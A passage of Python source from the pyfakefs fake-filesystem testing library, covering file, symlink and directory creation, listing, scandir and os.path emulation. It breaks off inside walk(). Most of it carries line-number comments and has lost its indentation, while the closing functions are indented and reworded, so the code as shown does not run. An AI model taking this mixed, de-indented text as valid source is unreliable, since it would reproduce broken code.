'This convenience method adds multiple files and/or directories from the\n real file system to the fake file system. See `add_real_file()` and\n `add_real_directory()`.\n New in pyfakefs 3.2.\n\n Args:\n path_list: List of file and directory paths in the real file system.\n read_only: If set, all files and files under under the directories are treated as read-only,\n e.g. a write access raises an exception;\n otherwise, writing to the files changes the fake files only as usually.\n lazy_dir_read: Uses lazy reading of directory contents if set\n (see `add_real_directory`)\n\n Raises:\n OSError: if any of the files and directories in the list does not exist in the real file system.\n OSError: if any of the files and directories in the list already exists in the fake file system.\n '
# line: 2177
for path in path_list:
# line: 2178
if os.path.isdir(path):
# line: 2179
self.add_real_directory(path, read_only, lazy_dir_read)
else:
# line: 2181
self.add_real_file(path, read_only)
# line: 2183
def CreateFileInternally(self, file_path, st_mode=(stat.S_IFREG | PERM_DEF_FILE), contents='', st_size=None, create_missing_dirs=True, apply_umask=False, encoding=None, errors=None, read_from_real_fs=False, read_only=True, raw_io=False):
# line: 2203
'Internal fake file creator that supports both normal fake files and fake\n files based on real files.\n\n Args:\n file_path: path to the file to create.\n st_mode: the stat.S_IF constant representing the file type.\n contents: the contents of the file.\n st_size: file size; only valid if contents not given.\n create_missing_dirs: if True, auto create missing directories.\n apply_umask: whether or not the current umask must be applied on st_mode.\n encoding: if contents is a unicode string, the encoding used for serialization.\n errors: the error mode used for encoding/decoding errors\n read_from_real_fs: if True, the contents are reaf from the real file system on demand.\n read_only: if set, the file is treated as read-only, e.g. a write access raises an exception;\n otherwise, writing to the file changes the fake file only as usually.\n raw_io: `True` if called from low-level API (`os.open`)\n '
# line: 2204
error_class = (OSError if raw_io else IOError)
# line: 2205
file_path = self.NormalizePath(file_path)
# line: 2208
if (self.Exists(file_path) or self.IsLink(file_path)):
# line: 2209
raise OSError(errno.EEXIST, 'File already exists in fake filesystem', file_path)
# line: 2212
(parent_directory, new_file) = self.SplitPath(file_path)
# line: 2213
if (not parent_directory):
# line: 2214
parent_directory = self.cwd
# line: 2215
self._AutoMountDriveIfNeeded(parent_directory)
# line: 2216
if (not self.Exists(parent_directory)):
# line: 2217
if (not create_missing_dirs):
# line: 2218
raise error_class(errno.ENOENT, 'No such fake directory', parent_directory)
# line: 2219
self.CreateDirectory(parent_directory)
else:
# line: 2221
parent_directory = self.NormalizeCase(parent_directory)
# line: 2222
if apply_umask:
# line: 2223
st_mode &= (~ self.umask)
# line: 2224
if read_from_real_fs:
# line: 2225
file_object = FakeFileFromRealFile(file_path, filesystem=self, read_only=read_only)
else:
# line: 2227
file_object = FakeFile(new_file, st_mode, filesystem=self, encoding=encoding, errors=errors)
# line: 2229
self._last_ino += 1
# line: 2230
file_object.SetIno(self._last_ino)
# line: 2231
self.AddObject(parent_directory, file_object, error_class)
# line: 2233
if ((not read_from_real_fs) and ((contents is not None) or (st_size is not None))):
# line: 2234
try:
# line: 2235
if (st_size is not None):
# line: 2236
file_object.SetLargeFileSize(st_size)
else:
# line: 2238
file_object._set_initial_contents(contents)
# line: 2239
except IOError:
# line: 2240
self.RemoveObject(file_path)
# line: 2241
raise
# line: 2243
return file_object
# line: 2246
def CreateLink(self, file_path, link_target, create_missing_dirs=True):
# line: 2261
'Create the specified symlink, pointed at the specified link target.\n\n Args:\n file_path: path to the symlink to create\n link_target: the target of the symlink\n create_missing_dirs: If `True`, any missing parent directories of\n file_path will be created\n\n Returns:\n the newly created FakeFile object.\n\n Raises:\n OSError: if the symlink could not be created (see `CreateFile`).\n OSError: if on Windows before Python 3.2.\n '
# line: 2262
if (not self._IsLinkSupported()):
# line: 2263
raise OSError('Symbolic links are not supported on Windows before Python 3.2')
# line: 2265
if (not self.IsLink(file_path)):
# line: 2266
file_path = self.ResolvePath(file_path)
# line: 2267
if (sys.version_info >= (3, 6)):
# line: 2268
link_target = os.fspath(link_target)
# line: 2269
return self.CreateFileInternally(file_path, st_mode=(stat.S_IFLNK | PERM_DEF), contents=link_target, create_missing_dirs=create_missing_dirs, raw_io=True)
# line: 2273
def CreateHardLink(self, old_path, new_path):
# line: 2289
"Create a hard link at new_path, pointing at old_path.\n New in pyfakefs 2.9.\n\n Args:\n old_path: an existing link to the target file.\n new_path: the destination path to create a new link at.\n\n Returns:\n the FakeFile object referred to by old_path.\n\n Raises:\n OSError: if something already exists at new_path.\n OSError: if old_path is a directory.\n OSError: if the parent directory doesn't exist.\n OSError: if on Windows before Python 3.2.\n "
# line: 2290
if (not self._IsLinkSupported()):
# line: 2291
raise OSError('Links are not supported on Windows before Python 3.2')
# line: 2292
new_path_normalized = self.NormalizePath(new_path)
# line: 2293
if self.Exists(new_path_normalized):
# line: 2294
raise OSError(errno.EEXIST, 'File already exists in fake filesystem', new_path)
# line: 2298
(new_parent_directory, new_basename) = self.SplitPath(new_path_normalized)
# line: 2299
if (not new_parent_directory):
# line: 2300
new_parent_directory = self.cwd
# line: 2302
if (not self.Exists(new_parent_directory)):
# line: 2303
raise OSError(errno.ENOENT, 'No such fake directory', new_parent_directory)
# line: 2307
try:
# line: 2308
old_file = self.ResolveObject(old_path)
# line: 2309
except:
# line: 2310
raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', old_path)
# line: 2314
if (old_file.st_mode & stat.S_IFDIR):
# line: 2315
raise OSError((errno.EACCES if self.is_windows_fs else errno.EPERM), 'Cannot create hard link to directory', old_path)
# line: 2320
old_file.name = new_basename
# line: 2321
self.AddObject(new_parent_directory, old_file)
# line: 2322
return old_file
# line: 2324
def ReadLink(self, path):
# line: 2338
'Read the target of a symlink.\n New in pyfakefs 3.0.\n\n Args:\n path: symlink to read the target of.\n\n Returns:\n the string representing the path to which the symbolic link points.\n\n Raises:\n TypeError: if path is None\n OSError: (with errno=ENOENT) if path is not a valid path, or\n (with errno=EINVAL) if path is valid, but is not a symlink.\n '
# line: 2339
if (path is None):
# line: 2340
raise TypeError
# line: 2341
try:
# line: 2342
link_obj = self.LResolveObject(path)
# line: 2343
except IOError as exc:
# line: 2344
raise OSError(exc.errno, 'Fake path does not exist', path)
# line: 2345
if (stat.S_IFMT(link_obj.st_mode) != stat.S_IFLNK):
# line: 2346
raise OSError(errno.EINVAL, 'Fake filesystem: not a symlink', path)
# line: 2347
return link_obj.contents
# line: 2349
def MakeDirectory(self, dir_name, mode=PERM_DEF):
# line: 2362
"Create a leaf Fake directory.\n New in pyfakefs 3.0.\n\n Args:\n dir_name: (str) Name of directory to create. Relative paths are assumed\n to be relative to '/'.\n mode: (int) Mode to create directory with. This argument defaults to\n 0o777. The umask is applied to this mode.\n\n Raises:\n OSError: if the directory name is invalid or parent directory is read only\n or as per `FakeFilesystem.AddObject()`.\n "
# line: 2363
if (sys.version_info >= (3, 6)):
# line: 2364
dir_name = os.fspath(dir_name)
# line: 2365
if self._EndsWithPathSeparator(dir_name):
# line: 2366
dir_name = dir_name[:(-1)]
# line: 2367
if (not dir_name):
# line: 2368
raise OSError(errno.ENOENT, 'Empty directory name')
# line: 2370
(parent_dir, _) = self.SplitPath(dir_name)
# line: 2371
if parent_dir:
# line: 2372
base_dir = self.CollapsePath(parent_dir)
# line: 2373
ellipsis = self._matching_string(parent_dir, (self.path_separator + '..'))
# line: 2374
if parent_dir.endswith(ellipsis):
# line: 2375
(base_dir, dummy_dotdot, _) = parent_dir.partition(ellipsis)
# line: 2376
if (not self.Exists(base_dir)):
# line: 2377
raise OSError(errno.ENOENT, 'No such fake directory', base_dir)
# line: 2379
dir_name = self.NormalizePath(dir_name)
# line: 2380
if self.Exists(dir_name):
# line: 2381
raise OSError(errno.EEXIST, 'Fake object already exists', dir_name)
# line: 2382
(head, tail) = self.SplitPath(dir_name)
# line: 2384
self.AddObject(head, FakeDirectory(tail, (mode & (~ self.umask)), filesystem=self))
# line: 2387
def MakeDirectories(self, dir_name, mode=PERM_DEF, exist_ok=False):
# line: 2402
'Create a leaf Fake directory and create any non-existent parent dirs.\n New in pyfakefs 3.0.\n\n Args:\n dir_name: (str) Name of directory to create.\n mode: (int) Mode to create directory (and any necessary parent\n directories) with. This argument defaults to 0o777. The umask is\n applied to this mode.\n exist_ok: (boolean) If exist_ok is False (the default), an OSError is\n raised if the target directory already exists. New in Python 3.2.\n\n Raises:\n OSError: if the directory already exists and exist_ok=False, or as per\n `FakeFilesystem.CreateDirectory()`.\n '
# line: 2403
dir_name = self.NormalizePath(dir_name)
# line: 2404
path_components = self.GetPathComponents(dir_name)
# line: 2408
current_dir = self.root
# line: 2409
for component in path_components:
# line: 2410
if ((component not in current_dir.contents) or (not isinstance(current_dir.contents, dict))):
# line: 2412
break
else:
# line: 2414
current_dir = current_dir.contents[component]
# line: 2415
try:
# line: 2416
self.CreateDirectory(dir_name, (mode & (~ self.umask)))
# line: 2417
except (IOError, OSError) as e:
# line: 2418
if ((not exist_ok) or (not isinstance(self.ResolveObject(dir_name), FakeDirectory))):
# line: 2420
if isinstance(e, OSError):
# line: 2421
raise
# line: 2422
raise OSError(e.errno, e.strerror, e.filename)
# line: 2424
def _IsType(self, path, st_flag, follow_symlinks=True):
# line: 2438
"Helper function to implement isdir(), islink(), etc.\n\n See the stat(2) man page for valid stat.S_I* flag values\n\n Args:\n path: path to file to stat and test\n st_flag: the stat.S_I* flag checked for the file's st_mode\n\n Returns:\n boolean (the st_flag is set in path's st_mode)\n\n Raises:\n TypeError: if path is None\n "
# line: 2439
if (sys.version_info >= (3, 6)):
# line: 2440
path = os.fspath(path)
# line: 2441
if (path is None):
# line: 2442
raise TypeError
# line: 2443
try:
# line: 2444
obj = self.ResolveObject(path, follow_symlinks)
# line: 2445
if obj:
# line: 2446
return (stat.S_IFMT(obj.st_mode) == st_flag)
# line: 2447
except (IOError, OSError):
# line: 2448
return False
# line: 2449
return False
# line: 2451
def IsDir(self, path, follow_symlinks=True):
# line: 2463
'Determine if path identifies a directory.\n New in pyfakefs 3.0.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a directory (following symlinks).\n\n Raises:\n TypeError: if path is None.\n '
# line: 2464
return self._IsType(path, stat.S_IFDIR, follow_symlinks)
# line: 2466
def IsFile(self, path, follow_symlinks=True):
# line: 2478
'Determine if path identifies a regular file.\n New in pyfakefs 3.0.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a regular file (following symlinks).\n\n Raises:\n TypeError: if path is None.\n '
# line: 2479
return self._IsType(path, stat.S_IFREG, follow_symlinks)
# line: 2481
def IsLink(self, path):
# line: 2493
'Determine if path identifies a symbolic link.\n New in pyfakefs 3.0.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a symlink (S_IFLNK set in st_mode)\n\n Raises:\n TypeError: if path is None.\n '
# line: 2494
return self._IsType(path, stat.S_IFLNK, follow_symlinks=False)
# line: 2496
def ConfirmDir(self, target_directory):
# line: 2508
'Test that the target is actually a directory, raising OSError if not.\n New in pyfakefs 3.0.\n\n Args:\n target_directory: path to the target directory within the fake filesystem.\n\n Returns:\n the FakeDirectory object corresponding to target_directory.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 2509
try:
# line: 2510
directory = self.ResolveObject(target_directory)
# line: 2511
except IOError as exc:
# line: 2512
raise OSError(exc.errno, exc.strerror, target_directory)
# line: 2513
if (not (directory.st_mode & stat.S_IFDIR)):
# line: 2514
raise OSError(errno.ENOTDIR, 'Fake os module: not a directory', target_directory)
# line: 2517
return directory
# line: 2519
def RemoveFile(self, path):
# line: 2530
'Remove the FakeFile object at the specified file path.\n New in pyfakefs 3.0.\n\n Args:\n path: path to file to be removed.\n\n Raises:\n OSError: if path points to a directory.\n OSError: if path does not exist.\n OSError: if removal failed.\n '
# line: 2531
path = self.NormalizePath(path)
# line: 2532
if self.Exists(path):
# line: 2533
obj = self.ResolveObject(path)
# line: 2534
if (stat.S_IFMT(obj.st_mode) == stat.S_IFDIR):
# line: 2535
link_obj = self.LResolveObject(path)
# line: 2536
if (stat.S_IFMT(link_obj.st_mode) != stat.S_IFLNK):
# line: 2537
raise OSError(errno.EISDIR, ("Is a directory: '%s'" % path))
# line: 2539
try:
# line: 2540
self.RemoveObject(path)
# line: 2541
except IOError as exc:
# line: 2542
raise OSError(exc.errno, exc.strerror, exc.filename)
# line: 2544
def RemoveDirectory(self, target_directory, allow_symlink=False):
# line: 2557
"Remove a leaf Fake directory.\n New in pyfakefs 3.0.\n\n Args:\n target_directory: (str) Name of directory to remove.\n allow_symlink: (bool) if `target_directory` is a symlink,\n the function just returns, otherwise it raises (Posix only)\n\n Raises:\n OSError: if target_directory does not exist.\n OSError: if target_directory does not point to a directory.\n OSError: if removal failed per FakeFilesystem.RemoveObject. Cannot remove '.'.\n "
# line: 2558
if (target_directory in ('.', u'.')):
# line: 2559
raise OSError(errno.EINVAL, "Invalid argument: '.'")
# line: 2560
target_directory = self.NormalizePath(target_directory)
# line: 2561
if self.ConfirmDir(target_directory):
# line: 2562
if ((not self.is_windows_fs) and self.IsLink(target_directory)):
# line: 2563
if allow_symlink:
# line: 2564
return
# line: 2565
raise OSError(errno.ENOTDIR, 'Cannot remove symlink', target_directory)
# line: 2567
dir_object = self.ResolveObject(target_directory)
# line: 2568
if dir_object.contents:
# line: 2569
raise OSError(errno.ENOTEMPTY, 'Fake Directory not empty', target_directory)
# line: 2571
try:
# line: 2572
self.RemoveObject(target_directory)
# line: 2573
except IOError as exc:
# line: 2574
raise OSError(exc.errno, exc.strerror, exc.filename)
# line: 2576
def ListDir(self, target_directory):
# line: 2588
'Return a list of file names in target_directory.\n New in pyfakefs 3.0.\n\n Args:\n target_directory: path to the target directory within the fake filesystem.\n\n Returns:\n a list of file names within the target directory in arbitrary order.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 2589
target_directory = self.ResolvePath(target_directory, allow_fd=True)
# line: 2590
directory = self.ConfirmDir(target_directory)
# line: 2591
directory_contents = directory.contents
# line: 2592
return list(directory_contents.keys())
# line: 2594
if (sys.version_info >= (3, 5)):
# line: 2595
class DirEntry:
# line: 2596
'Emulates os.DirEntry. Note that we did not enforce keyword only arguments.'
# line: 2598
def __init__(self, filesystem):
# line: 2603
'Initialize the dir entry with unset values.\n\n Args:\n filesystem: the fake filesystem used for implementation.\n '
# line: 2604
self._filesystem = filesystem
# line: 2605
self.name = ''
# line: 2606
self.path = ''
# line: 2607
self._inode = None
# line: 2608
self._islink = False
# line: 2609
self._isdir = False
# line: 2610
self._statresult = None
# line: 2611
self._statresult_symlink = None
# line: 2613
def inode(self):
# line: 2614
'Return the inode number of the entry.'
# line: 2615
if (self._inode is None):
# line: 2616
self.stat(follow_symlinks=False)
# line: 2617
return self._inode
# line: 2619
def is_dir(self, follow_symlinks=True):
# line: 2629
'Return True if this entry is a directory entry.\n\n Args:\n follow_symlinks: If True, also return True if this entry is a symlink\n pointing to a directory.\n\n Returns:\n True if this entry is an existing directory entry, or if\n follow_symlinks is set, and this entry points to an existing directory entry.\n '
# line: 2630
return (self._isdir and (follow_symlinks or (not self._islink)))
# line: 2632
def is_file(self, follow_symlinks=True):
# line: 2642
'Return True if this entry is a regular file entry.\n\n Args:\n follow_symlinks: If True, also return True if this entry is a symlink\n pointing to a regular file.\n\n Returns:\n True if this entry is an existing file entry, or if\n follow_symlinks is set, and this entry points to an existing file entry.\n '
# line: 2643
return ((not self._isdir) and (follow_symlinks or (not self._islink)))
# line: 2645
def is_symlink(self):
# line: 2646
'Return True if this entry is a symbolic link (even if broken).'
# line: 2647
return self._islink
# line: 2649
def stat(self, follow_symlinks=True):
# line: 2655
'Return a stat_result object for this entry.\n\n Args:\n follow_symlinks: If False and the entry is a symlink, return the\n result for the symlink, otherwise for the object it points to.\n '
# line: 2656
if follow_symlinks:
# line: 2657
if (self._statresult_symlink is None):
# line: 2658
file_object = self._filesystem.ResolveObject(self.path)
# line: 2659
if self._filesystem.is_windows_fs:
# line: 2662
file_object.st_ino = 0
# line: 2663
file_object.st_dev = 0
# line: 2664
file_object.st_nlink = 0
# line: 2665
self._statresult_symlink = file_object.stat_result.copy()
# line: 2666
return self._statresult_symlink
# line: 2668
if (self._statresult is None):
# line: 2669
file_object = self._filesystem.LResolveObject(self.path)
# line: 2670
self._inode = file_object.st_ino
# line: 2671
if self._filesystem.is_windows_fs:
# line: 2672
file_object.st_ino = 0
# line: 2673
file_object.st_dev = 0
# line: 2674
file_object.st_nlink = 0
# line: 2675
self._statresult = file_object.stat_result.copy()
# line: 2676
return self._statresult
# line: 2678
class ScanDirIter:
# line: 2681
'Iterator for DirEntry objects returned from `scandir()` function.\n New in pyfakefs 3.0.\n '
# line: 2683
def __init__(self, filesystem, path):
# line: 2684
self.filesystem = filesystem
# line: 2685
self.path = self.filesystem.ResolvePath(path)
# line: 2686
contents = {}
# line: 2687
try:
# line: 2688
contents = self.filesystem.ConfirmDir(path).contents
# line: 2689
except OSError:
# line: 2690
pass
# line: 2691
self.contents_iter = iter(contents)
# line: 2693
def __iter__(self):
# line: 2694
return self
# line: 2696
def __next__(self):
# line: 2697
entry = self.contents_iter.__next__()
# line: 2698
dir_entry = self.filesystem.DirEntry(self.filesystem)
# line: 2699
dir_entry.name = entry
# line: 2700
dir_entry.path = self.filesystem.JoinPaths(self.path, dir_entry.name)
# line: 2701
dir_entry._isdir = self.filesystem.IsDir(dir_entry.path)
# line: 2702
dir_entry._islink = self.filesystem.IsLink(dir_entry.path)
# line: 2703
return dir_entry
# line: 2705
if (sys.version_info >= (3, 6)):
# line: 2706
def __enter__(self):
# line: 2707
return self
# line: 2709
def __exit__(self, exc_type, exc_val, exc_tb):
# line: 2710
self.close()
# line: 2712
def close(self):
# line: 2713
pass
# line: 2715
def ScanDir(self, path=''):
# line: 2728
'Return an iterator of DirEntry objects corresponding to the entries\n in the directory given by path.\n New in pyfakefs 3.0.\n\n Args:\n path: path to the target directory within the fake filesystem.\n\n Returns:\n an iterator to an unsorted list of os.DirEntry objects for each entry in path.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 2729
return self.ScanDirIter(self, path)
# line: 2731
def __str__(self):
# line: 2732
return str(self.root)
# line: 2735
class FakePathModule(object):
# line: 2740
'Faked os.path module replacement.\n\n FakePathModule should *only* be instantiated by FakeOsModule. See the\n FakeOsModule docstring for details.\n '
# line: 2741
_OS_PATH_COPY = CopyModule(os.path)
# line: 2743
def __init__(self, filesystem, os_module=None):
# line: 2749
'Init.\n\n Args:\n filesystem: FakeFilesystem used to provide file system information\n os_module: (deprecated) FakeOsModule to assign to self.os\n '
# line: 2750
self.filesystem = filesystem
# line: 2751
self._os_path = self._OS_PATH_COPY
# line: 2752
if (os_module is None):
# line: 2753
warnings.warn(FAKE_PATH_MODULE_DEPRECATION, DeprecationWarning, stacklevel=2)
# line: 2755
self._os_path.os = self.os = os_module
# line: 2756
self.sep = self.filesystem.path_separator
# line: 2757
self.altsep = self.filesystem.alternative_path_separator
# line: 2759
def exists(self, path):
# line: 2767
'Determine whether the file object exists within the fake filesystem.\n\n Args:\n path: path to the file object.\n\n Returns:\n bool (if file exists).\n '
# line: 2768
return self.filesystem.Exists(path)
# line: 2770
def lexists(self, path):
# line: 2778
'Test whether a path exists. Returns True for broken symbolic links.\n\n Args:\n path: path to the symlink object.\n\n Returns:\n bool (if file exists).\n '
# line: 2779
return (self.exists(path) or self.islink(path))
# line: 2781
def getsize(self, path):
# line: 2789
'Return the file object size in bytes.\n\n Args:\n path: path to the file object.\n\n Returns:\n file size in bytes.\n '
# line: 2790
try:
# line: 2791
file_obj = self.filesystem.ResolveObject(path)
# line: 2792
return file_obj.st_size
# line: 2793
except IOError as exc:
# line: 2794
raise os.error(exc.errno, exc.strerror)
# line: 2796
def isabs(self, path):
# line: 2797
'Return True if path is an absolute pathname.'
# line: 2798
if self.filesystem.is_windows_fs:
# line: 2799
path = self.splitdrive(path)[1]
# line: 2800
if (sys.version_info >= (3, 6)):
# line: 2801
path = os.fspath(path)
# line: 2802
sep = self.filesystem._path_separator(path)
# line: 2803
altsep = self.filesystem._alternative_path_separator(path)
# line: 2804
if self.filesystem.is_windows_fs:
# line: 2805
return ((len(path) > 0) and (path[:1] in (sep, altsep)))
else:
# line: 2807
return (path.startswith(sep) or ((altsep is not None) and path.startswith(altsep)))
# line: 2809
def isdir(self, path):
# line: 2810
'Determine if path identifies a directory.'
# line: 2811
return self.filesystem.IsDir(path)
# line: 2813
def isfile(self, path):
# line: 2814
'Determine if path identifies a regular file.'
# line: 2815
return self.filesystem.IsFile(path)
# line: 2817
def islink(self, path):
# line: 2828
'Determine if path identifies a symbolic link.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a symbolic link.\n\n Raises:\n TypeError: if path is None.\n '
# line: 2829
return self.filesystem.IsLink(path)
# line: 2831
def getmtime(self, path):
# line: 2843
'Returns the modification time of the fake file.\n\n Args:\n path: the path to fake file.\n\n Returns:\n (int, float) the modification time of the fake file\n in number of seconds since the epoch.\n\n Raises:\n OSError: if the file does not exist.\n '
# line: 2844
try:
# line: 2845
file_obj = self.filesystem.ResolveObject(path)
# line: 2846
except IOError as exc:
# line: 2847
raise OSError(errno.ENOENT, str(exc))
# line: 2848
return file_obj.st_mtime
# line: 2850
def getatime(self, path):
# line: 2863
'Returns the last access time of the fake file.\n\n Note: Access time is not set automatically in fake filesystem on access.\n\n Args:\n path: the path to fake file.\n\n Returns:\n (int, float) the access time of the fake file in number of seconds since the epoch.\n\n Raises:\n OSError: if the file does not exist.\n '
# line: 2864
try:
# line: 2865
file_obj = self.filesystem.ResolveObject(path)
# line: 2866
except IOError as exc:
# line: 2867
raise OSError(errno.ENOENT, str(exc))
# line: 2868
return file_obj.st_atime
# line: 2870
def getctime(self, path):
# line: 2881
'Returns the creation time of the fake file.\n\n Args:\n path: the path to fake file.\n\n Returns:\n (int, float) the creation time of the fake file in number of seconds since the epoch.\n\n Raises:\n OSError: if the file does not exist.\n '
# line: 2882
try:
# line: 2883
file_obj = self.filesystem.ResolveObject(path)
# line: 2884
except IOError as exc:
# line: 2885
raise OSError(errno.ENOENT, str(exc))
# line: 2886
return file_obj.st_ctime
# line: 2888
def abspath(self, path):
# line: 2889
'Return the absolute version of a path.'
# line: 2891
def getcwd():
# line: 2892
'Return the current working directory.'
# line: 2894
if ((sys.version_info < (3,)) and isinstance(path, unicode)):
# line: 2895
return self.os.getcwdu()
elif ((sys.version_info >= (3,)) and isinstance(path, bytes)):
# line: 2897
return self.os.getcwdb()
else:
# line: 2899
return self.os.getcwd()
# line: 2901
if (sys.version_info >= (3, 6)):
# line: 2902
path = os.fspath(path)
# line: 2904
sep = self.filesystem._path_separator(path)
# line: 2905
altsep = self.filesystem._alternative_path_separator(path)
# line: 2906
if (not self.isabs(path)):
# line: 2907
path = self.join(getcwd(), path)
elif ((self.filesystem.is_windows_fs and path.startswith(sep)) or ((altsep is not None) and path.startswith(altsep))):
# line: 2911
cwd = getcwd()
# line: 2912
if self.filesystem.StartsWithDriveLetter(cwd):
# line: 2913
path = self.join(cwd[:2], path)
# line: 2914
return self.normpath(path)
# line: 2916
def join(self, *p):
# line: 2917
'Return the completed path with a separator of the parts.'
# line: 2918
return self.filesystem.JoinPaths(*p)
# line: 2920
def split(self, path):
# line: 2923
'Split the path into the directory and the filename of the path.\n New in pyfakefs 3.0.\n '
# line: 2924
return self.filesystem.SplitPath(path)
# line: 2926
def splitdrive(self, path):
# line: 2929
'Split the path into the drive part and the rest of the path, if supported.\n New in pyfakefs 2.9.\n '
# line: 2930
return self.filesystem.SplitDrive(path)
# line: 2932
def normpath(self, path):
# line: 2933
'Normalize path, eliminating double slashes, etc.'
# line: 2934
return self.filesystem.CollapsePath(path)
# line: 2936
def normcase(self, path):
# line: 2939
'Convert to lower case under windows, replaces additional path separator.\n New in pyfakefs 2.9.\n '
# line: 2940
path = self.filesystem.NormalizePathSeparator(path)
# line: 2941
if self.filesystem.is_windows_fs:
# line: 2942
path = path.lower()
# line: 2943
return path
# line: 2945
def relpath(self, path, start=None):
# line: 2946
'We mostly rely on the native implementation and adapt the path separator.'
# line: 2947
if (not path):
# line: 2948
raise ValueError('no path specified')
# line: 2949
if (sys.version_info >= (3, 6)):
# line: 2950
path = os.fspath(path)
# line: 2951
if (start is not None):
# line: 2952
start = os.fspath(start)
# line: 2953
if (start is None):
# line: 2954
start = self.filesystem.cwd
# line: 2955
if (self.filesystem.alternative_path_separator is not None):
# line: 2956
path = path.replace(self.filesystem.alternative_path_separator, self._os_path.sep)
# line: 2957
start = start.replace(self.filesystem.alternative_path_separator, self._os_path.sep)
# line: 2958
path = path.replace(self.filesystem.path_separator, self._os_path.sep)
# line: 2959
start = start.replace(self.filesystem.path_separator, self._os_path.sep)
# line: 2960
path = self._os_path.relpath(path, start)
# line: 2961
return path.replace(self._os_path.sep, self.filesystem.path_separator)
# line: 2963
def realpath(self, filename):
# line: 2967
'Return the canonical path of the specified filename, eliminating any\n symbolic links encountered in the path.\n New in pyfakefs 3.0.\n '
# line: 2968
if self.filesystem.is_windows_fs:
# line: 2969
return self.abspath(filename)
# line: 2970
if (sys.version_info >= (3, 6)):
# line: 2971
filename = os.fspath(filename)
# line: 2972
(path, ok) = self._joinrealpath(filename[:0], filename, {})
# line: 2973
return self.abspath(path)
# line: 2975
if ((sys.platform != 'win32') or (sys.version_info >= (3, 2))):
# line: 2976
def samefile(self, path1, path2):
# line: 2987
'Return whether path1 and path2 point to the same file.\n Windows support new in Python 3.2.\n New in pyfakefs 3.3.\n\n Args:\n path1: first file path or path object (Python >=3.6)\n path2: second file path or path object (Python >=3.6)\n\n Raises:\n OSError: if one of the paths does not point to an existing file system object.\n '
# line: 2988
stat1 = self.filesystem.GetStat(path1)
# line: 2989
stat2 = self.filesystem.GetStat(path2)
# line: 2990
return ((stat1.st_ino == stat2.st_ino) and (stat1.st_dev == stat2.st_dev))
# line: 2992
def _joinrealpath(self, path, rest, seen):
    """Join two paths, normalizing and eliminating any symbolic links
    encountered in the second path.
    Taken from Python source (posixpath._joinrealpath) and adapted.

    Args:
        path: already-resolved prefix (str or bytes).
        rest: remaining, unresolved suffix to be joined onto `path`.
        seen: dict mapping symlink paths already visited to their
            resolved targets (or None while resolution is in progress),
            used to detect symlink loops.

    Returns:
        Tuple (resolved_path, ok) where `ok` is False if a symlink loop
        was detected and resolution was abandoned.
    """
    # Build '.' / '..' / separator literals of the same type (str/bytes)
    # as `path`.
    curdir = self.filesystem._matching_string(path, '.')
    pardir = self.filesystem._matching_string(path, '..')
    sep = self.filesystem._path_separator(path)
    if self.isabs(rest):
        rest = rest[1:]
        path = sep
    # Consume `rest` one component at a time.
    while rest:
        (name, _, rest) = rest.partition(sep)
        if ((not name) or (name == curdir)):
            # Skip empty components and '.'.
            continue
        if (name == pardir):
            # '..' — pop one component from the resolved prefix if possible.
            if path:
                (path, name) = self.filesystem.SplitPath(path)
                if (name == pardir):
                    # Prefix already ends in '..'; keep accumulating them.
                    path = self.filesystem.JoinPaths(path, pardir, pardir)
            else:
                path = pardir
            continue
        newpath = self.filesystem.JoinPaths(path, name)
        if (not self.filesystem.IsLink(newpath)):
            path = newpath
            continue
        # `newpath` is a symlink: resolve it, guarding against loops.
        if (newpath in seen):
            path = seen[newpath]
            if (path is not None):
                # Already fully resolved earlier; reuse the cached target.
                continue
            # Symlink loop detected (resolution still in progress);
            # return what we have, flagged as not fully resolved.
            return (self.filesystem.JoinPaths(newpath, rest), False)
        # Mark as "in progress" before recursing, then cache the result.
        seen[newpath] = None
        (path, ok) = self._joinrealpath(path, self.filesystem.ReadLink(newpath), seen)
        if (not ok):
            return (self.filesystem.JoinPaths(path, rest), False)
        seen[newpath] = path
    return (path, True)
# line: 3040
def dirname(self, path):
    """Return the directory component of `path` (the first part of the
    result of `split()`).
    New in pyfakefs 3.0.
    """
    head, _tail = self.split(path)
    return head
# line: 3046
def expanduser(self, path):
    """Return the argument with an initial component of ~ or ~user
    replaced by that user's home directory.
    """
    # Delegate to the real os.path, then translate the real separator
    # into the fake filesystem's separator.
    expanded = self._os_path.expanduser(path)
    return expanded.replace(self._os_path.sep, self.sep)
# line: 3052
def ismount(self, path):
    """Return True if the given path is a mount point.
    New in pyfakefs 2.9.

    Args:
        path: path to filesystem object to be checked.

    Returns:
        True if `path` is a mount point added to the fake file system.
        Under Windows also returns True for drive and UNC roots
        (independent of their existence).
    """
    if sys.version_info >= (3, 6):
        path = os.fspath(path)
    if not path:
        return False
    normalized = self.filesystem.NormalizePath(path)
    sep = self.filesystem._path_separator(path)
    if self.filesystem.is_windows_fs:
        # Accept both separators when an alternative one is configured.
        if self.filesystem.alternative_path_separator is None:
            path_seps = (sep,)
        else:
            path_seps = (sep, self.filesystem._alternative_path_separator(path))
        drive, rest = self.filesystem.SplitDrive(normalized)
        if drive and drive[:1] in path_seps:
            # UNC path: a root like '//host/share' (empty or sep-only rest).
            return (not rest) or (rest in path_seps)
        if rest in path_seps:
            # Drive root such as 'c:\\'.
            return True
    # Compare against registered mount points, ignoring trailing separators.
    for point in self.filesystem.mount_points:
        if normalized.rstrip(sep) == point.rstrip(sep):
            return True
    return False
# line: 3086
if (sys.version_info < (3, 0)):

    def walk(self, top, func, arg):
        """Directory tree walk with callback function (Python 2 only).
        New in pyfakefs 3.0.

        Args:
            top: root path to traverse. The root itself is not included
                in the called elements.
            func: function to be called for each visited path node.
            arg: first argument to be called with func (apart from
                dirname and filenames).
        """
        try:
            entries = self.filesystem.ListDir(top)
        except os.error:
            return
        func(arg, top, entries)
        for entry in entries:
            full_name = self.filesystem.JoinPaths(top, entry)
            if self.filesystem.is_windows_fs:
                if self.filesystem.IsDir(full_name):
                    self.walk(full_name, func, arg)
            else:
                # POSIX: do not follow symlinks while recursing.
                try:
                    entry_stat = self.filesystem.GetStat(full_name, follow_symlinks=False)
                except os.error:
                    continue
                if stat.S_ISDIR(entry_stat.st_mode):
